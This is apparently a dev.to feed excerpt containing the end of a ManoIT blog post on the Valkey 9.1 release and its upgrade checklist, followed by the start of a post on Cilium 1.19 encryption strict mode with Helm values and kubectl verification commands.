&lt;p&gt;Pre-9.0 cluster resharding was &lt;strong&gt;key-by-key move-then-delete&lt;/strong&gt;. If a client touched a key mid-migration, it didn't know which node held it, adding hops; in multi-key ops with keys split across two nodes, the client had to retry; and a huge collection key could exceed the target node's input buffer and block the migration outright. 9.0 atomically moves an &lt;strong&gt;entire slot (of 16,384) in AOF format&lt;/strong&gt;. The source node keeps all keys until the slot migration fully completes, so redirects, retries, and giant-key blocking disappear structurally. 9.1's valkey-cli uses this directly via the &lt;code&gt;--cluster-use-atomic-slot-migration&lt;/code&gt; flag on &lt;code&gt;--cluster rebalance&lt;/code&gt;/&lt;code&gt;--cluster reshard&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  7.2 Hash Field Expiration — per-field TTL
&lt;/h3&gt;

&lt;p&gt;Hashes bundle many fields under one key, but pre-9.0 expiry was &lt;em&gt;all-or-nothing at the key level&lt;/em&gt;. Expiring only some fields required multi-key hacks, adding complexity and memory. 9.0 added a per-field TTL command family: &lt;code&gt;HEXPIRE&lt;/code&gt;, &lt;code&gt;HPEXPIRE&lt;/code&gt;, &lt;code&gt;HTTL&lt;/code&gt;, &lt;code&gt;HGETEX&lt;/code&gt;, &lt;code&gt;HSETEX&lt;/code&gt;, &lt;code&gt;HPERSIST&lt;/code&gt;, and more. Combined with 9.1's &lt;code&gt;HGETDEL&lt;/code&gt;, hash-based job queues and session stores become far cleaner.&lt;/p&gt;

&lt;h3&gt;
  
  
  7.3 Other 9.0 improvements
&lt;/h3&gt;

&lt;p&gt;9.0 also delivered: &lt;strong&gt;1B RPS on a 2,000-node cluster&lt;/strong&gt; (large-cluster resilience), &lt;strong&gt;pipeline memory prefetch&lt;/strong&gt; (up to 40% throughput), &lt;strong&gt;zero-copy responses&lt;/strong&gt; (up to 20%), &lt;strong&gt;Multipath TCP&lt;/strong&gt; (up to 25% lower latency), &lt;strong&gt;SIMD for BITCOUNT and HyperLogLog&lt;/strong&gt; (up to 200%), polygon-based geospatial queries, conditional delete &lt;code&gt;DELIFEQ&lt;/code&gt;, &lt;code&gt;CLIENT LIST&lt;/code&gt; filtering, and restored usage recommendations for 25 previously deprecated commands. If 9.0 was "a leap in performance and features," 9.1 is "the security/observability/efficiency finish on top."&lt;/p&gt;

&lt;h2&gt;
  
  
  8. Operational Decisions — Upgrade / Migration Flow
&lt;/h2&gt;

&lt;p&gt;Below is the 9.1 adoption decision flow used by ManoIT's platform team.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;flowchart TD
    A[Current in-memory store] --&amp;gt; B{Engine?}
    B --&amp;gt;|Redis 7.2 or older OSS| C[Evaluate drop-in migration&amp;lt;br/&amp;gt;to BSD-3 Valkey 9.1]
    B --&amp;gt;|Valkey 8.x| D[9.1 minor upgrade]
    B --&amp;gt;|Redis 7.4+ SSPL| E[Decide after license policy review]
    C --&amp;gt; F{Use scripting?}
    D --&amp;gt; F
    F --&amp;gt;|No| G[Don't load Lua module&amp;lt;br/&amp;gt;shrink attack surface]
    F --&amp;gt;|Yes| H[Keep Lua module loaded]
    G --&amp;gt; I{Multi-tenant?}
    H --&amp;gt; I
    I --&amp;gt;|Yes| J[Consolidate instances via&amp;lt;br/&amp;gt;numbered DBs + per-db ACLs]
    I --&amp;gt;|No| K[Single-db operation]
    J --&amp;gt; L[Wire JSON logging + thread metrics&amp;lt;br/&amp;gt;into observability pipeline]
    K --&amp;gt; L
    L --&amp;gt; M[Validate in staging 2 weeks → gradual prod rollout]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  9. ManoIT Internal Adoption Checklist
&lt;/h2&gt;

&lt;p&gt;The checklist below turns the above into an internal operations procedure. ManoIT runs cache/session/ranking clusters in three tiers (dev/stage/prod) and validates even minor releases for two weeks in staging before prod.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;#&lt;/th&gt;
&lt;th&gt;Item&lt;/th&gt;
&lt;th&gt;Owner&lt;/th&gt;
&lt;th&gt;Done criteria&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Inventory engine/version across all clusters (incl. Redis/Valkey mix)&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;Version matrix PR&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Audit Lua scripting usage — trace &lt;code&gt;EVAL&lt;/code&gt;/&lt;code&gt;EVALSHA&lt;/code&gt; calls&lt;/td&gt;
&lt;td&gt;Service owners&lt;/td&gt;
&lt;td&gt;Identify scripting-free clusters&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Upgrade dev cluster to 9.1 (keep Lua loaded, default config)&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;INFO server&lt;/code&gt; = 9.1.0&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Client compatibility regression in dev — verify new commands/response changes&lt;/td&gt;
&lt;td&gt;Service owners&lt;/td&gt;
&lt;td&gt;Client SDK compatibility report&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Design numbered DBs + per-db ACLs on multi-tenant candidate clusters&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;Tenant↔db↔ACL mapping doc&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Drop Lua module on scripting-free clusters&lt;/td&gt;
&lt;td&gt;Platform + Security&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;INFO scripting_engines&lt;/code&gt; = empty&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Enable JSON logging (&lt;code&gt;log-format json&lt;/code&gt;) → wire to Loki&lt;/td&gt;
&lt;td&gt;Observability&lt;/td&gt;
&lt;td&gt;Structured log collection + dashboard&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;Expose main/IO thread usage metrics to Prometheus + alarms&lt;/td&gt;
&lt;td&gt;Observability&lt;/td&gt;
&lt;td&gt;IO-thread-saturation alarm fire/resolve test&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;Validate TLS auto-reload + cert-expiry metric, pilot SAN-URI mTLS&lt;/td&gt;
&lt;td&gt;Security&lt;/td&gt;
&lt;td&gt;Zero-downtime cert rotation verified&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;Staging 9.1 upgrade + load test (&lt;code&gt;valkey-benchmark --warmup --duration&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;Zero throughput/latency regression report&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;Standardize &lt;code&gt;--cluster-use-atomic-slot-migration&lt;/code&gt; on resharding&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;Resharding runbook updated&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;Gradual prod upgrade (replica → primary, slot-level verification)&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;All prod nodes 9.1.0 + zero-downtime availability&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;13&lt;/td&gt;
&lt;td&gt;Measure real memory savings post-upgrade (small-string / sorted-set heavy clusters)&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;Before/after &lt;code&gt;used_memory&lt;/code&gt; comparison&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;14&lt;/td&gt;
&lt;td&gt;Validate rollback — 8.x downgrade path when new 9.1 commands are unused&lt;/td&gt;
&lt;td&gt;Platform&lt;/td&gt;
&lt;td&gt;Rollback rehearsal passed&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  10. Conclusion — A Minor Release That Made Security, Observability, and Efficiency the Operational Default
&lt;/h2&gt;

&lt;p&gt;Sum up 9.1 in one line: &lt;strong&gt;"on the performance/feature leap 9.0 laid down, it adds the most operational finish — security, observability, and efficiency."&lt;/strong&gt; Numbered DB-level ACLs open a path to multi-tenant isolation at db granularity without adding instances; Lua-as-a-module applies the zero-trust principle "turn off what you don't use" at the core. The new I/O threading model hit 2.1M RPS on a single server, and 20% memory savings on small strings hit cache cost directly. JSON logging and thread usage metrics absorb the observability gap you previously filled with sidecars and exporters, while HGETDEL/MSETEX/CLUSTERSCAN collapse common patterns' round trips and transactions into single commands.&lt;/p&gt;

&lt;p&gt;Three things to remember operationally. (1) &lt;strong&gt;Audit Lua usage first&lt;/strong&gt; — dropping the module shrinks the attack surface, but a careless removal breaks features that relied on &lt;code&gt;EVAL&lt;/code&gt;. (2) &lt;strong&gt;Remember numbered DBs are logical isolation&lt;/strong&gt; — per-db ACLs are powerful but not physical isolation, so keep instance separation for regulated data. (3) &lt;strong&gt;Don't skip staging validation, even for a minor release&lt;/strong&gt; — global-behavior changes like the hardware clock default and new I/O threading are included, so pre-validate on special virtualization environments. The shortest one-line recommendation in this article: &lt;em&gt;"Upgrade dev to 9.1 this week, and start the security PR to drop the Lua module on your scripting-free clusters first."&lt;/em&gt;&lt;/p&gt;




&lt;blockquote&gt;
&lt;p&gt;ℹ️ This article was written by ManoIT's automated blogging pipeline (Claude Opus 4.6 + Cowork Agent), analyzing the official Valkey 9.1.0 release blog (valkey.io, May 19, 2026), the Valkey 9.0 GA blog (Oct 21, 2025), the Linux Foundation 9.1 release announcement (PRNewswire), Phoronix's 9.1 review, and the valkey-io/valkey GitHub release notes as primary sources. Command syntax, performance figures, and flag names reflect official docs as of publication (2026-05-29) and may change in future patches. Verify current status at valkey.io/commands and GitHub Releases before applying to production. The internal adoption example is adapted from ManoIT platform team's operational procedures.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://www.manoit.co.kr/forum/view/1480274" rel="noopener noreferrer"&gt;ManoIT Tech Blog&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>database</category>
      <category>redis</category>
      <category>devops</category>
      <category>opensource</category>
    </item>
    <item>
      <title>Cilium 1.19 Deep Dive — 10-Year Anniversary: IPsec/WireGuard Strict Mode, Ztunnel Beta, Policy-Default-Local-Cluster, Multi-Pool IPAM Stable</title>
      <dc:creator>daniel jeong</dc:creator>
      <pubDate>Thu, 28 May 2026 00:32:04 +0000</pubDate>
      <link>https://dev.to/x4nent/cilium-119-deep-dive-10-year-anniversary-ipsecwireguard-strict-mode-ztunnel-beta-4eo9</link>
      <guid>https://dev.to/x4nent/cilium-119-deep-dive-10-year-anniversary-ipsecwireguard-strict-mode-ztunnel-beta-4eo9</guid>
      <description>&lt;h1&gt;
  
  
  Cilium 1.19 Deep Dive — 10-Year Anniversary Release: IPsec/WireGuard Strict Mode, Ztunnel Transparent Encryption Beta, Policy-Default-Local-Cluster, Multi-Pool IPAM Stable, and Hubble Drop Tagging Redefining the 2026 eBPF Networking, Security, and Observability Standard
&lt;/h1&gt;

&lt;h2&gt;
  
  
  TL;DR
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Cilium v1.19 (May 13, 2026) is the 10-year anniversary release and flips multiple defaults toward operational safety.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;IPsec / WireGuard strict mode&lt;/strong&gt; drops unencrypted traffic by default, ending best-effort encryption gaps.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;ClusterMesh policy-default-local-cluster&lt;/strong&gt; is now the default — audit your existing NetworkPolicies before upgrading or you will silently cut multi-cluster traffic.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Ztunnel Transparent Encryption (Beta)&lt;/strong&gt; brings sidecarless workload-identity mTLS to Cilium, interoperable with Istio Ambient.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Multi-Pool IPAM&lt;/strong&gt; graduates to Stable, &lt;strong&gt;Hubble&lt;/strong&gt; adds drop policy tagging + encrypted-flow filters + Trace IP Options, and Network Policy denials can now return &lt;strong&gt;ICMPv4 Destination Unreachable&lt;/strong&gt; to skip the 30-second TCP retry loop.&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;

&lt;p&gt;Cilium hit a clean ten years since its first commit, and v1.19 lands as the anniversary release. v1.19.0 dropped in mid-May 2026 and patches rolled to v1.19.4 within two weeks. There is no single flagship feature on the cover — instead, six axes evolve simultaneously to prove the promise of &lt;em&gt;"an eBPF dataplane you can actually operate quarter after quarter."&lt;/em&gt; (1) &lt;strong&gt;Strict modes&lt;/strong&gt; for IPsec and WireGuard turn node-to-node encryption from best-effort into a hard requirement. (2) &lt;strong&gt;Ztunnel Transparent Encryption&lt;/strong&gt; lands as a beta integration, opening a sidecarless workload-identity encryption path next to the node-level encryption story. (3) ClusterMesh &lt;strong&gt;policy-default-local-cluster&lt;/strong&gt; becomes the new default, structurally blocking the "I wrote a local policy that quietly fanned out across the mesh" class of incidents. (4) &lt;strong&gt;Multi-Pool IPAM&lt;/strong&gt; graduates from Beta to Stable and now works with IPsec and direct routing. (5) Hubble adds &lt;strong&gt;drop event policy tagging&lt;/strong&gt;, &lt;strong&gt;encrypted-flow filters&lt;/strong&gt;, and &lt;strong&gt;Trace IP Options&lt;/strong&gt; so "why was this packet dropped?" is answerable in one command. (6) Network Policy denials can now return &lt;strong&gt;ICMPv4 Destination Unreachable&lt;/strong&gt;, ending the dumb 30-second TCP retry loop. This article decomposes the root cause of each of the six changes at the eBPF datapath / policy compilation / CRD schema level and lays out the nine-step upgrade, observation, and rollback playbook ManoIT applied across three internal Kubernetes clusters (prod / stage / dev).&lt;/p&gt;

&lt;h2&gt;
  
  
  1. Why May 2026's v1.19 is an inflection point for Cilium
&lt;/h2&gt;

&lt;p&gt;Cilium started in April 2016 when Thomas Graf rewrote the Kubernetes dataplane in eBPF instead of iptables. v1.0 in 2018, CNCF Sandbox in 2019, Incubating in 2021, and Graduated in October 2023 — by now Cilium is the dataplane behind or recommended by GKE Dataplane v2, EKS Anywhere, OpenShift, Talos Linux, K3s, and most other major Kubernetes distributions. &lt;strong&gt;v1.19 is the inflection point where the 10-year anniversary symbolism meets a deliberate maintainer pivot: "operational safety nets become the default."&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Date&lt;/th&gt;
&lt;th&gt;Event&lt;/th&gt;
&lt;th&gt;Operational meaning&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;2016.04&lt;/td&gt;
&lt;td&gt;Cilium first commit (Thomas Graf)&lt;/td&gt;
&lt;td&gt;eBPF-based K8s dataplane launches&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2018.04&lt;/td&gt;
&lt;td&gt;v1.0 — Production-ready&lt;/td&gt;
&lt;td&gt;"L7 visibility + identity-based" model settles&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2019.06&lt;/td&gt;
&lt;td&gt;CNCF Sandbox accepted&lt;/td&gt;
&lt;td&gt;Community governance stage 1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2021.10&lt;/td&gt;
&lt;td&gt;CNCF Incubating&lt;/td&gt;
&lt;td&gt;Hubble · ClusterMesh stabilization era&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2023.10&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;CNCF Graduated&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Enterprise adoption guidelines formalized&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2024.04&lt;/td&gt;
&lt;td&gt;v1.16 — Gateway API Beta, Multi-Pool IPAM Beta&lt;/td&gt;
&lt;td&gt;Service mesh + multi-CIDR operations activated&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2025.05&lt;/td&gt;
&lt;td&gt;v1.17 — Gateway API GA, BGPv2 Stable&lt;/td&gt;
&lt;td&gt;Accelerated Ingress NGINX retirement flow&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2025.10&lt;/td&gt;
&lt;td&gt;v1.18 — ClusterMesh API server v2, KVStoreMesh stable&lt;/td&gt;
&lt;td&gt;Simplified large-scale multi-cluster control plane&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.05.13&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;v1.19 — Strict Mode, Ztunnel Beta, policy-default-local-cluster, Multi-Pool IPAM Stable, Hubble drop tagging, ICMP friendly deny&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Operational safety nets become the default&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2026.05.27&lt;/td&gt;
&lt;td&gt;v1.19.4 patch release&lt;/td&gt;
&lt;td&gt;Rapid 0.x stabilization in progress&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Two messages matter for operators. (1) &lt;em&gt;"Default changes are the biggest changes."&lt;/em&gt; — ClusterMesh's policy-default-local-cluster flipping from false to true is not a feature addition; it is &lt;strong&gt;the default safety posture of multi-cluster policy flipping&lt;/strong&gt;. (2) &lt;em&gt;"Strict mode is the fastest path through a compliance audit."&lt;/em&gt; — Once IPsec or WireGuard is in strict mode, unencrypted traffic is dropped on the wire, so the "we encrypted, but some packets leaked in plaintext" audit finding disappears structurally.&lt;/p&gt;

&lt;h2&gt;
  
  
  2. IPsec/WireGuard Strict Mode — best-effort encryption becomes hard requirement
&lt;/h2&gt;

&lt;p&gt;The longest section in the v1.19 release notes. Cilium's transparent encryption has supported IPsec since v1.4 and WireGuard since v1.10. But both modes were &lt;strong&gt;best-effort&lt;/strong&gt;: "encrypt where we can, fall back to plaintext when peer keys aren't established or the protocol can't negotiate." That fallback was the most common finding in security audits.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.1 Three gaps of the best-effort era
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Scenario&lt;/th&gt;
&lt;th&gt;v1.18 behavior&lt;/th&gt;
&lt;th&gt;Audit verdict&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;New node joins cluster, key exchange still in progress&lt;/td&gt;
&lt;td&gt;Plaintext until key negotiation completes, then encryption&lt;/td&gt;
&lt;td&gt;"Plaintext window exists" finding&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WireGuard peer key missing on a discovered node&lt;/td&gt;
&lt;td&gt;Plaintext fallback&lt;/td&gt;
&lt;td&gt;"Cannot enforce encryption" finding&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;IPsec XFRM policy partially expired (SPI rotation)&lt;/td&gt;
&lt;td&gt;Plaintext fallback during renegotiation&lt;/td&gt;
&lt;td&gt;"Plaintext traffic visible in audit log" finding&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  2.2 v1.19 fix — strict mode drops unencrypted traffic
&lt;/h3&gt;

&lt;p&gt;v1.19 adds &lt;code&gt;encryption.strictMode&lt;/code&gt; to both IPsec and WireGuard. With it enabled, the following behavior is enforced:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# helm/cilium-values.yaml — IPsec strict mode&lt;/span&gt;
&lt;span class="c1"&gt;# WARNING: Enable only after keys are distributed to every node.&lt;/span&gt;
&lt;span class="c1"&gt;# Partial rollout will drop plaintext and cut communication.&lt;/span&gt;
&lt;span class="na"&gt;encryption&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ipsec&lt;/span&gt;
  &lt;span class="na"&gt;ipsec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;interface&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
    &lt;span class="na"&gt;keyFile&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;keys&lt;/span&gt;
    &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/etc/ipsec&lt;/span&gt;
  &lt;span class="na"&gt;strictMode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;                &lt;span class="c1"&gt;# v1.19 new — best-effort -&amp;gt; hard requirement&lt;/span&gt;
    &lt;span class="na"&gt;cidr&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;10.0.0.0/8"&lt;/span&gt;           &lt;span class="c1"&gt;# CIDR strict applies to (usually covers PodCIDR)&lt;/span&gt;
    &lt;span class="na"&gt;allowRemoteNodeIdentities&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;   &lt;span class="c1"&gt;# new nodes without keys are dropped immediately&lt;/span&gt;
&lt;span class="na"&gt;nodeinit&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# helm/cilium-values.yaml — WireGuard strict mode&lt;/span&gt;
&lt;span class="na"&gt;encryption&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;wireguard&lt;/span&gt;
  &lt;span class="na"&gt;nodeEncryption&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;wireguard&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;persistentKeepalive&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;0s"&lt;/span&gt;
  &lt;span class="na"&gt;strictMode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;                &lt;span class="c1"&gt;# v1.19 new&lt;/span&gt;
    &lt;span class="na"&gt;cidr&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;10.0.0.0/8"&lt;/span&gt;
    &lt;span class="na"&gt;allowRemoteNodeIdentities&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Verify after applying&lt;/span&gt;
helm upgrade cilium cilium/cilium &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--version&lt;/span&gt; 1.19.4 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--namespace&lt;/span&gt; kube-system &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-f&lt;/span&gt; helm/cilium-values.yaml &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--reuse-values&lt;/span&gt;

&lt;span class="c"&gt;# Per-node strict status&lt;/span&gt;
kubectl &lt;span class="nt"&gt;-n&lt;/span&gt; kube-system &lt;span class="nb"&gt;exec&lt;/span&gt; &lt;span class="nt"&gt;-it&lt;/span&gt; ds/cilium &lt;span class="nt"&gt;--&lt;/span&gt; cilium status &lt;span class="nt"&gt;--verbose&lt;/span&gt; | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-A&lt;/span&gt; 3 Encryption
&lt;span class="c"&gt;# Encryption:               Wireguard [strict]&lt;/span&gt;
&lt;span class="c"&gt;# Strict mode CIDR:         10.0.0.0/8&lt;/span&gt;
&lt;span class="c"&gt;# Allowed remote identities: 0&lt;/span&gt;
&lt;span class="c"&gt;# Unencrypted drops (last 1m): 0&lt;/span&gt;

&lt;span class="c"&gt;# Intentional plaintext blocking check&lt;/span&gt;
kubectl &lt;span class="nb"&gt;exec&lt;/span&gt; &lt;span class="nt"&gt;-it&lt;/span&gt; test-pod &lt;span class="nt"&gt;--&lt;/span&gt; ping &lt;span class="nt"&gt;-c&lt;/span&gt; 3 unencrypted-peer-ip
&lt;span class="c"&gt;# PING ... 100% packet loss   ← strict is doing its job&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2.3 Operational rollout — 4-step gradient to avoid cluster-wide outage
&lt;/h3&gt;

&lt;p&gt;Strict mode, if flipped at the wrong time, instantly takes the cluster offline. ManoIT's internal standard is a 4-step gradient:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Step&lt;/th&gt;
&lt;th&gt;Action&lt;/th&gt;
&lt;th&gt;Verification&lt;/th&gt;
&lt;th&gt;Rollback trigger&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;Distribute keyFile to every node, restart cilium in plaintext mode&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;cilium status&lt;/code&gt; reports keys OK on every node&lt;/td&gt;
&lt;td&gt;If any single node lacks keys, abort&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;Set &lt;code&gt;strictMode.enabled=true&lt;/code&gt; with &lt;code&gt;allowRemoteNodeIdentities=true&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Hubble drop counters unchanged&lt;/td&gt;
&lt;td&gt;Drops appear → flip back to false immediately&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;After 1 week stable, flip &lt;code&gt;allowRemoteNodeIdentities=false&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Join a fresh node, verify post-key-registration traffic flows&lt;/td&gt;
&lt;td&gt;If new nodes must join without keys, temporarily set true&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Add Prometheus alert on &lt;code&gt;cilium_encryption_unencrypted_packets_dropped_total&lt;/code&gt; increasing&lt;/td&gt;
&lt;td&gt;Zero alert fires for 14 days&lt;/td&gt;
&lt;td&gt;On a fire, root-cause first, then re-enable&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  3. Ztunnel Transparent Encryption Beta — sidecarless workload authentication
&lt;/h2&gt;

&lt;p&gt;The second big change is aligned with the service-mesh ecosystem's direction. v1.19 ships a beta integration of &lt;strong&gt;Ztunnel&lt;/strong&gt; (zero-trust tunnel), the same primitive Istio Ambient Mode standardized. This is not just "Istio compatibility" — it means the Cilium node agent coordinates directly with ztunnel to run a separate mTLS dataplane wrapping workload-to-workload TCP.&lt;/p&gt;

